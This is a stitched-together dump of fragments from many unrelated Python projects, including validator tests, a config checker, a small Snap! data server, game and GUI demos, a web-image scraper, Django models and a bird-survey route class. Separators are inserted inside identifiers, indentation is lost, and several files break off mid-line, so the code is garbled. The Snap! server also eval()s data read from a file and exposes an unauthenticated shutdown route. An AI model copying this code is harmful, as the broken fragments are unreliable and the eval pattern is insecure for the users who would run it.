ext = valid | ators.AbstractE | xtractor()
ext.query = '$val.vee'
ext.is_templated = True
context = Context()
context.bind_variable('val', 'foo')
self.assertEqual('$val.vee', ext.templated_query())
self.assertEqual('foo.vee', ext.templated_query(context=context))
ext.is_templated = False
self.assertEqual('$val.vee', ext.templated_query(context=context))
    def test_abstract_extractor_readableconfig(self):
        """ Test human-readable extractor config string output """
        config = 'key.val'
        extractor = validators.parse_extractor('jsonpath_mini', config)
        expected_string = 'Extractor Type: jsonpath_mini, Query: "key.val", Templated?: False'
        self.assertEqual(expected_string, extractor.get_readable_config())
        # Check empty context & args uses okay
        context = Context()
        self.assertEqual(expected_string, extractor.get_readable_config(context=context))
        context.bind_variable('foo', 'bar')
        self.assertEqual(expected_string, extractor.get_readable_config(context=context))
        extractor.args = dict()
        self.assertEqual(expected_string, extractor.get_readable_config(context=context))
        # Check args output is handled correctly
        extractor.args = {'caseSensitive': True}
        self.assertEqual(expected_string+", Args: "+str(extractor.args), extractor.get_readable_config(context=context))
        # Check template handling is okay
        config = {'template': 'key.$templated'}
        context.bind_variable('templated', 'val')
        extractor = validators.parse_extractor('jsonpath_mini', config)
        expected_string = 'Extractor Type: jsonpath_mini, Query: "key.val", Templated?: True'
        self.assertEqual(expected_string, extractor.get_readable_config(context=context))
    def test_parse_extractor(self):
        """ Test parsing an extractor using the registry """
        config = 'key.val'
        myjson = '{"key": {"val": 3}}'
        extractor = validators.parse_extractor('jsonpath_mini', config)
        self.assertTrue(isinstance(extractor, validators.AbstractExtractor))
        self.assertEqual(3, extractor.extract(body=myjson))
    def test_get_extractor(self):
        # _get_extractor pulls the extractor part out of a full validator
        # config dict (ignoring comparator/expected).
        config = {
            'jsonpath_mini': 'key.val',
            'comparator': 'eq',
            'expected': 3
        }
        extractor = validators._get_extractor(config)
        myjson = '{"key": {"val": 3}}'
        extracted = extractor.extract(body=myjson)
        self.assertEqual(3, extracted)
def test_parse_validator(self):
""" Test basic parsing using registry """
config = {
'jsonpath_mini': 'key.val',
'comparator': 'eq',
'expected': 3
}
validator = validators.parse_validator('comparator', config)
myjson = '{"key": {"val": 3}}'
comp = val |
avatao-content/challenge-toolbox | toolbox/utils/config.py | Python | apache-2.0 | 4,202 | 0.002142 | import os
import re
import yaml
try:
from packaging.version import parse as parse_version
except ImportError:
from pkg_resources import parse_version
from toolbox.config.common import BUTTON_CONFIG_KEYS, CRP_TYPES, CURRENT_MAX_VERSION, CURRENT_MIN_VERSION, PROTOCOLS
from .utils import counted_error, fatal_error
def compare_version(config: dict, min_version: str, max_version: str):
    """Return -1, 0 or 1 depending on whether config['version'] lies below,
    inside, or above the [min_version, max_version] interval."""
    current = parse_version(config['version'])
    lower = parse_version(min_version)
    upper = parse_version(max_version)
    if current < lower:
        return -1
    return 1 if current > upper else 0
def validate_version(config: dict):
    # Abort with an actionable message when the config version falls
    # outside the supported [CURRENT_MIN_VERSION, CURRENT_MAX_VERSION].
    cmp = compare_version(config, CURRENT_MIN_VERSION, CURRENT_MAX_VERSION)
    if cmp < 0:
        fatal_error('Please, upgrade to version %s with upgrade.py!', CURRENT_MIN_VERSION)
    if cmp > 0:
        fatal_error('Please, use a newer toolbox for version %s!', config['version'])
def get_crp_type(config: dict) -> str:
    # Return the challenge's crp_type, defaulting to 'static'; abort on
    # values outside the known CRP_TYPES set.
    crp_type = config.get('crp_type') or 'static'
    if crp_type not in CRP_TYPES:
        fatal_error("Unknown crp_type: '%s' / %s", crp_type, CRP_TYPES)
    return crp_type
def read_config(path: str, *, pre_validate: bool = True) -> dict:
    """
    Read the config.yml file
    :param path: path to the file or the base directory
    :param pre_validate: check version and crp_type fields
    :return: dict
    """
    if os.path.isdir(path):
        path = os.path.join(path, 'config.yml')
    try:
        with open(path, 'r') as f:
            config = yaml.safe_load(f)
        if pre_validate:
            # Fail fast on unsupported versions or unknown challenge types.
            validate_version(config)
            get_crp_type(config)
        return config
    except Exception as e:
        # Any read/parse/validation problem is fatal for the toolbox run.
        fatal_error('%s(%s)', type(e).__name__, e)
def parse_bool(value) -> bool:
    """Loosely interpret *value* as a boolean: only 'true' or '1'
    (case-insensitively, after str() conversion) count as True."""
    text = str(value).lower()
    return text in ('true', '1')
def validate_bool(key, value):
    """Record a counted error unless *value* reads as a boolean-ish string."""
    accepted = ('true', 'false', '1', '0')
    if str(value).lower() not in accepted:
        counted_error('Invalid %s value. It must be boolean.', key)
def validate_flag(config: dict, flag_required: bool = False):
    # Validate static-flag settings: regex flags must compile, static flags
    # require the flag input box, and when flag_required is set a flag must
    # be present at all.
    validate_bool('enable_flag_input', config.get('enable_flag_input'))
    if config.get('flag'):
        try:
            # Flags prefixed with 'regex:' must be valid regular expressions.
            if config['flag'][0:6] == 'regex:':
                re.compile(config['flag'][6:])
        except TypeError:
            counted_error('Invalid flag value. It must be string.')
        except Exception:
            counted_error('Failed to compile regex flag.')
        if not parse_bool(config.get('enable_flag_input')):
            counted_error('enable_flag_input must be true for static flags.')
    elif flag_required:
        counted_error('A static (or regex) flag must be set.')
def validate_ports(ports: list, buttons: dict = None): | # pylint: disable=too-many-branches
unique_ports = set()
ssh_ports_count = 0
for port in ports:
try:
port, protocol = port.split('/', 1)
unique_ports.add(port)
try:
if not 0 < int(port) < 65536:
raise ValueError
except Exception:
counted_error('Invalid port number: %s. Ports must be numbers between 1 and 65535.', port)
if protocol not in PROTOCOLS:
count | ed_error('Invalid protocol in config.yml: %s. Valid protocols: %s', protocol, PROTOCOLS)
if protocol == 'ssh':
ssh_ports_count += 1
except Exception:
counted_error('Invalid port format. [port/protocol]')
if len(unique_ports) != len(ports):
counted_error('Duplicate port numbers found.')
if ssh_ports_count > 1:
counted_error('More than one SSH ports. Please, use a single SSH connection.')
if buttons is not None:
if not isinstance(buttons, dict):
counted_error('The buttons field must be a dict.')
else:
for button_key, button in buttons.items():
if button_key not in ports:
counted_error('Button key %s is not found in ports.', button_key)
for key in button.keys():
if key not in BUTTON_CONFIG_KEYS:
counted_error('Key %s is invalid for button %s.', key, button_key)
|
Code-WvS/snapmesh | snapmesh.py | Python | gpl-3.0 | 851 | 0.011751 | #!/u | sr/bin/env python2
import snapext, os
handler = sna | pext.SnapHandler
data = dict()
@handler.route('/')
def main():
return 'Ich bin online!'
@handler.route('/check')
def key_in_data(key):
return key in data
@handler.route('/get')
def get_data(key):
return data[key] if key_in_data(key) else ''
@handler.route('/put')
def set_data(key, value):
data[key] = value
@handler.route('/list')
def list_data():
return '\n'.join(data.keys())
@handler.route('/bye')
def shutdown():
with open('data', 'w+') as _:
_.write(str(data))
exit(1)
#os.system('shutdown -hP now')
if __name__ == '__main__':
if os.path.isfile('data'):
with open('data') as _:
s = _.read()
try:
data = eval(_.read())
except:
pass
snapext.main(handler, 80)
|
tech22info/registrator | regs/mailru_registrator.py | Python | gpl-3.0 | 106 | 0.009434 | #!/usr | /bin/python3
# encoding=utf-8
import reg_mailru_email
print (reg_mailru_email.reg_mailru_email())
| |
pystockhub/book | ch15/01.py | Python | mit | 67 | 0 | import | matplotlib.pyplot as plt
plt.plot([1, | 2, 3, 4])
plt.show()
|
DMIAlumni/pydrone-game | pydrone/drones/base.py | Python | bsd-2-clause | 790 | 0 | class BaseDrone(object):
"""
Drone interface
"""
flipflop = False
distances = []
last_direction = 0
last_modifier = 0
fuel = 2000
graph = Non | e
kb = None
algorithm = None
def __init__(self, world_size, x, y):
# Initialize knowledge base and starting position
self.actual_position = (x, y)
self.kb_generator(world_size, x, y)
def kb_generator(self, world_size, x, y):
raise NotImplementedError()
def move(self, x, y):
raise NotImplementedError()
def strategy(self):
raise NotImplementedError()
def probe(self, distance):
raise NotImplem | entedError()
def print_status(self):
"""
Not required (ex: optimal algorithm test)
"""
pass
|
wemanuel/smry | smry/server-auth/ls/google-cloud-sdk/lib/googlecloudsdk/compute/subcommands/http_health_checks/delete.py | Python | apache-2.0 | 786 | 0.008906 | # Copyright 2014 Google Inc. All Rights Reserved.
""" | Command for deleting HTTP health checks."""
from googlecloudsdk.compute.lib im | port base_classes
class Delete(base_classes.GlobalDeleter):
"""Delete HTTP health checks."""
@staticmethod
def Args(parser):
cli = Delete.GetCLIGenerator()
base_classes.GlobalDeleter.Args(parser, 'compute.httpHealthChecks', cli,
'compute.http-health-checks')
@property
def service(self):
return self.compute.httpHealthChecks
@property
def resource_type(self):
return 'httpHealthChecks'
Delete.detailed_help = {
'brief': 'Delete HTTP health checks',
'DESCRIPTION': """\
*{command}* deletes one or more Google Compute Engine
HTTP health checks.
""",
}
|
widowild/messcripts | exercice/python2/chap15/canon01.py | Python | gpl-3.0 | 1,632 | 0.011029 | # -*- coding:Latin-1 -*-
from Tkinter import *
from math import pi, sin, cos
class Canon(object):
"""Petit canon graphique"""
def __init__(self, boss, x, y):
self.boss = | boss # référence du canevas
self.x1, self.y1 = x, y # axe de rotation du canon
# dessiner la buse du canon, à l'horizontale pour commencer :
self.lbu = 50 # longueur de la buse
self.x2, self.y2 = x + self.lbu, y
self.buse = boss.create_line(self.x1, self.y1, self.x2, self.y2,
width =10)
# dessiner ensuite le corps du | canon par-dessus :
r = 15 # rayon du cercle
boss.create_oval(x-r, y-r, x+r, y+r, fill='blue', width =3)
def orienter(self, angle):
"choisir l'angle de tir du canon"
# rem : le paramètre <angle> est reçu en tant que chaîne de car.
# il faut le traduire en nombre réel, puis convertir en radians :
self.angle = float(angle)*2*pi/360
self.x2 = self.x1 + self.lbu*cos(self.angle)
self.y2 = self.y1 - self.lbu*sin(self.angle)
self.boss.coords(self.buse, self.x1, self.y1, self.x2, self.y2)
if __name__ == '__main__':
# Code pour tester sommairement la classe Canon :
f = Tk()
can = Canvas(f,width =250, height =250, bg ='ivory')
can.pack(padx =10, pady =10)
c1 = Canon(can, 50, 200)
s1 =Scale(f, label='hausse', from_=90, to=0, command=c1.orienter)
s1.pack(side=LEFT, pady =5, padx =20)
s1.set(25) # angle de tir initial
f.mainloop()
|
2ndQuadrant/ansible | test/units/module_utils/facts/virtual/test_linux.py | Python | gpl-3.0 | 876 | 0.003425 | # -*- coding: utf-8 -*-
# Copyright (c) 2020 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible.module_utils.facts.virtual import linux
def test_get_virtual_facts_bhyve(mocker):
mocker.patch('os.path.exists', return_value=False)
mocker.patch('ansible.module_utils.facts.virtual.linux.get_file_co | ntent', return_value='')
mocker.patch('ansible.module_utils.facts.virtual.linux.get_file_lines', return_value=[])
module = mocker.Mock()
module.run_command.return_value = (0, 'BHYVE\n', '')
inst = linux.LinuxVirtual(module)
facts = inst.get_virtual_facts()
expected = {
'virtualization_role': 'guest',
'virtualization_type': 'bhyve' | ,
}
assert facts == expected
|
embaldridge/retriever | app/download_manager.py | Python | mit | 4,858 | 0.00247 | """This class manages dataset downloads concurrently and processes progress
output."""
import wx
from retriever.lib.download import DownloadThread
class DownloadManager:
def __init__(self, parent):
self.dialog = None
self.worker = None
self.queue = []
self.downloaded = set()
self.errors = set()
self.warnings = set()
self.Parent = parent
self.timer = wx.Timer(parent, -1)
self.timer.interval = 10
parent.Bind(wx.EVT_TIMER, self.update, self.timer)
def Download(self, script):
if not script in self.queue and not (self.worker and self.worker.script == script):
self.queue.append(script)
self.downloaded.add(script)
if script in self.errors:
self.errors.remove(script)
self.warnings.remove(script)
self.Parent.script_list.RefreshMe(None)
if not self.timer.IsRunning() and not self.worker and len(self.queue) < 2:
self.timer.Start(self.timer.interval)
return True
return False
def update(self, evt):
self.timer.Stop()
terminate = False
if self.worker:
script = self.worker.script
if self.worker.finished() and len(self.worker.output) == 0:
if hasattr(script, 'warnings') and script.warnings:
self.warnings.add(script)
self.Parent.SetStatusText('\n'.join(str(w) for w in script.warnings))
else:
self.Parent.SetStatusText("")
self.worker = None
self.Parent.script_list.RefreshMe(None)
self.timer.Start(self.timer.interval)
else:
self.worker.output_lock.acquire()
while len(self.worker.output) > 0 and not terminate:
if "Error:" in self.worker.output[0] and script in self.downloaded:
self.downloaded.remove(script)
self.errors.add(script)
if self.write(self.worker) == False:
terminate = True
self.worker.output = self.worker.output[1:]
#self.gauge.SetValue(100 * ((self.worker.scriptnum) /
# (self.worker.progress_max + 1.0)))
self.worker.output_lock.release()
if terminate:
self.Parent.Quit(None)
else:
self.timer.Start(s | elf.timer.interval)
elif self.queue:
script = self.queue[0]
self.queue = self.queue[1:]
self.worker = DownloadThread(self.Parent.engine, script)
self.worker.parent = self
self.worker.start()
self.timer.Start(10)
def flush(self):
pass
def write(self, worker):
s = worker.output[0]
if | '\b' in s:
s = s.replace('\b', '')
if not self.dialog:
wx.GetApp().Yield()
self.dialog = wx.ProgressDialog("Download Progress",
"Downloading datasets . . .\n"
+ " " * len(s),
maximum=1000,
parent=None,
style=wx.PD_SMOOTH
| wx.DIALOG_NO_PARENT
| wx.PD_CAN_ABORT
| wx.PD_AUTO_HIDE
| wx.PD_REMAINING_TIME
)
def progress(s):
if ' / ' in s:
s = s.split(' / ')
total = float(s[1])
current = float(s[0].split(': ')[1])
progress = int((current / total) * 1000)
return (progress if progress > 1 else 1)
else:
return None
current_progress = progress(s)
if current_progress:
(keepgoing, skip) = self.dialog.Update(current_progress, s)
else:
(keepgoing, skip) = self.dialog.Pulse(s)
if not keepgoing:
return False
else:
if self.dialog:
self.dialog.Update(1000, "")
self.dialog.Destroy()
self.dialog = None
if '...' in s:
self.Parent.SetStatusText(s)
else:
self.Parent.script_list.SetStatus(worker.script.name, s)
wx.GetApp().Yield()
return True
|
fstltna/PyImp | pyimp.py | Python | gpl-2.0 | 8,968 | 0.002119 | #!/usr/bin/env python
"""Main initialization file for empire client."""
# Copyright (C) 1998-1999 Kevin O'Connor
# Copyright (C) 2013 William Fittge
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import sys
import os
import getopt
import string
import operator
import traceback
#import pygame # Not used right now
import time
# Key Ideas:
# What is contained within this file:
# This file contains the code necessary to "bootstrap" the other code
# files. The code in this file has been left intentionally sparse because
# it is often translated to byte-code multiple times.
# The use of global variables throughout this project:
# In general, I dislike the use of global variables. I have made an effort
# to document each use of global variables in each module. (True global
# variables - not global constants.) There are a couple of critical global
# variables that future developers should know of:
#
# viewer : The viewer class is defined in just about all modules. This
# variable is used for reporting errors, sending commands, and many other
# functions.
#
# empDb.megaDB : This is the location of the internal database. This
# database stores all the gathered information from the server. Different
# databases can be dynamicaly loaded/saved to disk, but at any one time
# the client only supports a single countries' database.
#
# Although I dislike global variables, I felt it necessary to use them in
# the above circumstances. Under normal conditions, almost all classes and
# functions require both viewer and megaDB. It makes little sense to pass
# these variables with nearly every single call. Also, that many
# references to the same variable is bound to cause some form of circular
# referencing, which is not a good idea(tm) in Python.
###########################################################################
############################ Python 1.5.2 Check ###########################
try:
test = r"Test for 'r' string flag."
del test
try:
# Python 1.5.1 and earlier returned 0 for atoi('-')...
string.atoi('-')
except ValueError:
pass
else:
raise "outdated.."
except:
print """
It appears this version of Python is out-dated. You must have Python 1.5.2
or later installed in order for the client to work. See the web site at:
http://www.python.org/ for more information on upgrading Python.
"""
sys.exit(1)
VERSION = '0.1.0'
###########################################################################
############################# Initialization ############################
def initialize():
"""Parse the command-line and initialize the socket and interface."""
global viewer
# Attempt to find the username.
try: USERNAME = os.environ['USER']
except (AttributeError, KeyError):
USERNAME = 'PythonTk'
# Check command line for the database filename.
usage = ("Usage:\n"
+ str(sys.argv[0]) + " [-a] [-v] [-l] [-p] [-t|-c|-x] [-n] [-I <include directory>] "
+"[<database filename>]")
versionText = """PyImp Imperium Client %s
Copyright (C) 2015 Marisa Giancarla and others.
PyImp comes with ABSOLUTELY NO WARRANTY; for details
type `%s -l'. This is free software, and you are welcome
to redistribute it under certain conditions; type `%s -l'
for details.""" % (VERSION, str(sys.argv[0]), str(sys.argv[0]))
licenseText = """PyImp Imperium Client %s
Copyright (C) 1998-2000 Kevin O'Connor.
Copyright (C) 2001-2002 Laurent Martin.
Copyright (C) 2013 William Fittge.
Copyright (C) 2015 Marisa Giancarla.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2 as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111,
USA.
To contact the developers, please send email to <info@empiredirectory.net>.
""" % (VERSION)
try:
opts, args = getopt.getopt(sys.argv[1:], 'apvltcxnh?I:', ['help'])
except getopt.error:
print usage
sys.exit()
# Check for help request
argnames = map(operator.getitem, opts, [0]*len(opts))
if ('-h' in argnames or '-?' in argnames or '--help' in argnames
or len(args) > 1):
print usage
sys.exit()
if '-v' in argnames:
print versionText
sys.exit(0)
if '-l' in argnames:
print licenseText
sys.exit(0)
# Check for visual assistance
if '-a' in argnames:
assist = 1
else:
assist = 0
# Check for predict flag
if '-p' in argnames:
predict = 1
else:
predict = 0
# Check for forced text startup
if '-t' in argnames:
textonly = 1
elif '-c' in argnames:
textonly = 2
elif '-x' in argnames:
textonly = -1
else:
textonly = 0
# Check for a request to not automatically connect.
autoconnect = ('-n' not in argnames)
# Get the database name
if len(args) == 1:
FILE = args[0]
else:
F | ILE = "ImpDB"
# Check for included directory list
# The default include path is: the current directory, the program's
# directory.
includes = ['', sys.path[0]]
for i, j in opts:
if i == '-I':
includes[:0] = [j]
def pathPrefix(str, dirlist=includes):
"""Check installation directory for file."""
for i in dirlist:
fullname = os.path.join(i, str)
if os.path.isfile(fullname):
return fullname
# Couldn't f | ind the file - maybe the caller will have more luck:
return ""
# Mangle the system module path. Replace current directory with src/
# sub-directory.
sys.path[0] = os.path.join(sys.path[0], "src")
# Load modules
import empDb
import empQueue
import empCmd
# Hack! Pass on the pathPrefix function
empQueue.pathPrefix = pathPrefix
# Load the database.
try:
empDb.DBIO.load(FILE)
except:
print ("PyImp: Encountered error while loading database.\n"
"PyImp: Perhaps this is an old database?\n")
traceback.print_exc()
sys.exit()
# Setup an automatic database saver.
sys.exitfunc = empDb.DBIO.save
empDb.predict = predict
empDb.assist = assist
if textonly == 1:
import empText
viewer = empText.SText()
elif textonly == 2:
import empCurses
viewer = empCurses.Curses()
elif textonly == -1:
import empTk
viewer = empTk.mainWin()
else:
# Attempt to load Tk viewer. If that fails use text interface.
try:
import empTk
except:
print (
'An exception (%s) raised during Tk initialization:\n"%s"\n'
"Reverting to text interface.\n"
) % tuple(sys.exc_info()[:2])
import empText
viewer = empText.SText()
else:
viewer = empTk.mainWin()
# Set some common defaults among all the interfaces.
empDb. |
barnone/EigenD | tools/pip_cmd/__init__.py | Python | gpl-3.0 | 715 | 0.001399 |
#
# Copyright 2009 Eigenlabs Ltd. http://www.eigenlabs.com
#
# This file is part of EigenD.
#
# EigenD is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EigenD is distributed in the | hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EigenD. If not, se | e <http://www.gnu.org/licenses/>.
#
|
kouritron/uvs | libuvs/uvsconst.py | Python | bsd-3-clause | 2,870 | 0.006969 |
# this module tries to implement a replacement for python's lack of language enforced constants.
class _UVSConst(object):
# ------------------------------------------------------------------------------------------------------------------
# save the constants here
def _PASSWORD_PROMPT(self):
return ">>> Enter Password: "
def _MERGE3_CONFLICT_DELIMITER_START(self):
return "<<<<<<< "
def _MERGE3_CONFLICT_DELIMITER_MIDDLE_1(self):
return "||||||| "
def _MERGE3_CONFLICT_DELIMITER_MIDDLE_2(self):
return "======= "
def _MERGE3_CONFLICT_DELIMITER_END(self):
return ">>>>>>> "
def _AMS_MERGE_RESULT_FOLDER_NAME(self):
return "merge_result"
def _AMS_CA_FOLDER_NAME(self):
return "common_ancestor"
def _AMS_ONGOING_MERGE_TEMP_FILENAME(self):
return "ongoing_merge"
def _DISK_IO_READ_SIZE_RECOMMENDATION(self):
""" For performance reasons when reading data from a file its better to
read this many bytes at a time, rather than 1 byte at a time. """
return 8192
# ------------------------------------------------------------------------------------------------------------------
# a single setter for all of our properties
def _set_any_const(self, value):
""" Raises | a ValueError exception to emulate language enforced constants. """
raise ValueError("Can't change constants, don't try.")
# | ------------------------------------------------------------------------------------------------------------------
# declare them here for outside use
PASSWORD_PROMPT = property(_PASSWORD_PROMPT, _set_any_const)
MERGE3_CONFLICT_DELIMITER_START = property(_MERGE3_CONFLICT_DELIMITER_START, _set_any_const)
MERGE3_CONFLICT_DELIMITER_MIDDLE_1 = property(_MERGE3_CONFLICT_DELIMITER_MIDDLE_1, _set_any_const)
MERGE3_CONFLICT_DELIMITER_MIDDLE_2 = property(_MERGE3_CONFLICT_DELIMITER_MIDDLE_2, _set_any_const)
MERGE3_CONFLICT_DELIMITER_END = property(_MERGE3_CONFLICT_DELIMITER_END, _set_any_const)
DISK_IO_READ_SIZE_RECOMMENDATION = property(_DISK_IO_READ_SIZE_RECOMMENDATION, _set_any_const)
AMS_MERGE_RESULT_FOLDER_NAME = property(_AMS_MERGE_RESULT_FOLDER_NAME, _set_any_const)
AMS_CA_FOLDER_NAME = property(_AMS_CA_FOLDER_NAME, _set_any_const)
AMS_ONGOING_MERGE_TEMP_FILENAME = property(_AMS_ONGOING_MERGE_TEMP_FILENAME, _set_any_const)
UVSConst = _UVSConst()
if '__main__' == __name__:
print UVSConst.PASSWORD_PROMPT
# this will raise error
# UVSConst.PASSWORD_PROMPT = 10
print UVSConst.MERGE3_CONFLICT_DELIMITER_START
print UVSConst.MERGE3_CONFLICT_DELIMITER_MIDDLE_1
print UVSConst.MERGE3_CONFLICT_DELIMITER_MIDDLE_2
print UVSConst.MERGE3_CONFLICT_DELIMITER_END
print UVSConst.DISK_IO_READ_SIZE_RECOMMENDATION
|
garyForeman/LHBassClassifier | image_scrape/get_thumbnails.py | Python | agpl-3.0 | 3,278 | 0.00061 | #! /usr/bin/env python
"""
Author: Gary Foreman
Created: August 6, 2016
This script scrapes thumbnail images from thread links in the For Sale: Bass
Guitars forum at talkbass.com
"""
from __future__ import print_function
from glob import glob
import os
import sys
import urllib
from PIL import Image, ImageOps
import pymongo
sys.path.append('..')
from utilities.utilities import pause_scrape, report_progress
MIN_PAUSE_SECONDS = 0.15
MAX_PAUSE_SECONDS = 0.5
REPORT_MESSAGE = 'Scraped image'
REPORT_FREQUENCY = 300
DATA_PATH = os.path.join('..', 'data', 'images')
def make_data_dir():
"""
Checks to see whether DATA_PATH exists. If not, creates it.
"""
if not os.path.isdir(DATA_PATH):
os.makedirs(DATA_PATH)
def filename_from_url(thumbnail_url):
"""
thumbnai | l_url : a string with a url to a bass image
Strips filename from the end of thumbnail_url and prepends DATA_PATH.
Also ensures the file extension is jpg
"""
filename = thumbnail_url.strip('/').split('/')[-1]
basename, ext = os.path.splitext(filename)
return os.path.join(DATA_PATH, basename + '.jpg')
def download_thumb(thumbn | ail_url):
"""
thumbnail_url : a string with a url to a bass image
Pulls dowm image from thumbnail_url and stores in DATA_DIR
"""
filename = filename_from_url(thumbnail_url)
try:
urllib.urlretrieve(thumbnail_url, filename)
except IOError:
# URL is not an image file
pass
except UnicodeError:
# URL contains non-ASCII characters
pass
def crop_image(filename):
"""
filename: a string with the name to a locally stored image file
Crops image at filename to 128 x 128 pixels and overwrites original
"""
try:
img = Image.open(filename)
img = ImageOps.fit(img, (128, 128), Image.ANTIALIAS)
img.save(filename)
except NameError:
# File does not exist
pass
except IOError:
# Image is corrupted
try:
os.remove(filename)
except OSError:
# Filename is too long
pass
def main():
make_data_dir()
# Establish connection to MongoDB open on port 27017
client = pymongo.MongoClient()
# Access threads database
db = client.for_sale_bass_guitars
# Get database documents
cursor = db.threads.find()
# Get list of images that have already been scraped
scraped_image_list = glob(os.path.join(DATA_PATH, '*.jpg'))
thumbnail_url_list = []
for document in cursor:
thumbnail_url = document[u'image_url']
try:
filename = filename_from_url(thumbnail_url)
if filename not in scraped_image_list:
thumbnail_url_list.append(thumbnail_url)
except AttributeError:
# thread has no associated thumbnail
pass
client.close()
thumbnail_count = 1
for thumbnail_url in thumbnail_url_list:
download_thumb(thumbnail_url)
filename = filename_from_url(thumbnail_url)
crop_image(filename)
pause_scrape(MIN_PAUSE_SECONDS, MAX_PAUSE_SECONDS)
report_progress(thumbnail_count, REPORT_MESSAGE, REPORT_FREQUENCY)
thumbnail_count += 1
if __name__ == "__main__":
main()
|
jwilson780/VirtualStockMarket | stockmarket/models.py | Python | mit | 2,038 | 0.008342 | from django.db import models
from django.contrib.auth.models import User
class StockStatus(models.Model):
date = models.DateTimeField(auto_now_add=True)
price = models.FloatField()
change = models.FloatField()
volume = models.IntegerField()
average_daily_volume = models.IntegerField()
market_cap = models.CharField(max_length=100)
book_value = models.FloatField()
ebitda = models.CharField(max_length=100)
dividend_per_share = models.FloatField()
dividend_yield = models.FloatField()
earnings_per_share = models.FloatField()
i52_week_high = models.FloatField()
i52_week_low = models.FloatField()
i50_day_moving_average = models.FloatField()
i200_day_moving_average = models.FloatField()
price_to_earnings_ratio = mo | dels.FloatField()
price_to_earnings_growth_ratio = models.FloatField()
price_to_sales_ratio = models.FloatField()
price_to_book_ratio = models.FloatField()
class Stock(models.Model):
symbol = models.CharField(max_length=25)
exchange = models.CharField(max_length=25)
history = models.ManyToManyField(StockStatus)
price = models.FloatField()
def __unicode__(sel | f): return self.symbol
class Order(models.Model):
type = models.CharField(max_length=25)
amount = models.IntegerField()
stock = models.ForeignKey(Stock)
date = models.DateTimeField(auto_now_add=True)
def __unicode__(self): return u'%s %s' % (self.type, self.stock.symbol)
class Position(models.Model):
amount = models.IntegerField()
stock = models.ForeignKey(Stock)
value = models.FloatField()
def __unicode__(self): return u'%s of %s' % (self.amount, self.stock.symbol)
class Portfolio(models.Model):
user = models.ForeignKey(User)
history = models.ManyToManyField(Order)
positions = models.ManyToManyField(Position)
value = models.FloatField()
balance = models.FloatField()
created = models.DateTimeField(auto_now_add=True)
def __unicode__(self): return self.user.username |
piw/pyCDL | pyCDL/route.py | Python | gpl-3.0 | 9,010 | 0 | import numpy as np
from definition import states_by_id
import pyproj as prj
class Route:
"""
A class of Breeding Bird Survey (BBS) route
Each Route includes the following members:
id - id number of the route
name - name of the route
stateID - to which state the route belongs
routeID - route ID inside each state
length - length published by USGS
path - 2D numpy array of point coordinates along the route
in default projection: EPSG:5070 (USGS standard).
!!! Note the points are not the stops of Bird Survey
!!! They are simply points to define a polyline of the route
path2 - path array converted to longitude/latitude
stops - 2D array of stop coordinates along the route
!!! Note the location of stops are calculated
!!! by distance from starting point along the route,
!!! currently hard-coded as every 800 meter (0.5 mile)
stops2 - stops array converted to longitude/latitude
stop_d - distance between stops, by standard should be around 800m,
but may vary a lot, currently I assume the 50 stops
distributed evenly along the route, i.e. stop_d = length / 49
rating - type of route (single or multiple)
TODO: specify details on this feature
"""
# header - for export and print use
header = '%s\t%s\t%s\t%s\t%s\t%s\t%s\n' % (
'ID', 'State ID', 'State',
'Route ID', 'Route Name', 'Route Length', 'Route Rating'
)
def __init__(self, fields, records):
"""
Initialize a Route using information in the USGS shapefile.
fields: field label used in shapefile
records: a list of route part records in the shapefile
"single" route contains only one part
"multiple" route contains multiple parts, but can be
stitched together
"""
# load information from the fields in the shapefile
i = 1
while i < len(fields):
if fields[i][0] == 'rteno':
self.id = records[0].record[i - 1]
self.stateID = self.id // 1000
self.routeID = self.id % 1000
if fields[i][0] == 'RTENAME':
self.name = records[0].record[i - 1]
if fields[i][0] == 'rte_length':
self.length = float(records[0].record[i - 1])
i = i + 1
# generate a complete route path
if len(records) == 1:
self.rating = 'single'
self.path = np.array(records[0].shape.points)
self.path2 = self.to_lonlat(self.path)
else:
self.rating = 'multiple'
# generate a list of points in each segments
self.path = np.array(records[0].shape.points)
thresh = 10.0
i = 1
while i < len(records):
r = np.array(records[i].shape.points)
p1 = self.path[0]
p2 = self.path[-1]
s1 = r[0]
s2 = r[-1]
if np.linalg.norm(p2 - s1) < thresh:
self.path = np.vstack((self.path, r))
elif np.linalg.norm(p2 - s2) < thresh:
self.path = np.vstack((self.path, r[-1::-1]))
elif np.linalg.norm(s2 - p1) < thresh:
self.path = np.vstack((r, self.path))
elif np.linalg.norm(s1 - p1) < thresh:
self.path = np.vstack((r[-1::-1], self.path))
else:
self.rating = 'broken'
break
i = i + 1
self.path2 = self.to_lonlat(self.path)
# calculate 50 stops along the path
if self.rating is not 'broken':
self.stops, self.st | op_d = self.calc_stop()
self.stops2 = self.to_lonlat(self.stops)
else:
self.stops = np.array(())
self.stops2 = np.array(())
self.stop_d = 0.0
# output Route summary
print(self.summary())
def to_lonlat(self, pts):
"""
Convert coordinate from EPSG: | 5070 to EPSG:4326 (Longitude/Latitide)
"""
new_pts = np.zeros_like(pts)
# define input/output projections of lon/lat transformation
inProj = prj.Proj(init='epsg:5070') # Albers Equal Area
outProj = prj.Proj(init='epsg:4326') # Lat/Long Geodetic System
